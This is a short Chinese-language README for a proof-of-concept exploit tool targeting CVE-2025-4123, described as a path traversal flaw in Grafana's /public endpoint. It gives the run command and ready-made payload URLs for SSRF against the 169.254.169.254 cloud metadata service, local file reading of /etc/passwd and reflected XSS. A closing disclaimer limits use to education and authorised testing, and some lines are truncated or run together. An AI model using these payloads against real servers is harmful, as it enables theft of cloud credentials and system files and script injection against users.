由 mitsec 开发
这是一个针对 CVE-2025-4123 的概念验证 (PoC) 漏洞利用工具,该漏洞是 Grafana 的 /public 端点中的一个严重路径遍历漏洞。该漏洞利用可以实现:
Grafana 实例中 /public/ 端点未正确处理编码路径,例如:
/public/..%2F%5coast.pro%2F%3f%2F..%2F..
python3 cve_2025_4123_exploit_mitsec_final.py
然后选择所需的模式:
169.254.169.254/etc/passwd[*] SSRF URL: http://127.0.0.1:3000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F..
[*] LFI URL: http://127.0.0.1:3000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd
[*] XSS URL: http://127.0.0.1:3000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E
此代码仅供教育和授权测试使用。未经同意对系统进行未经授权的使用是违法的。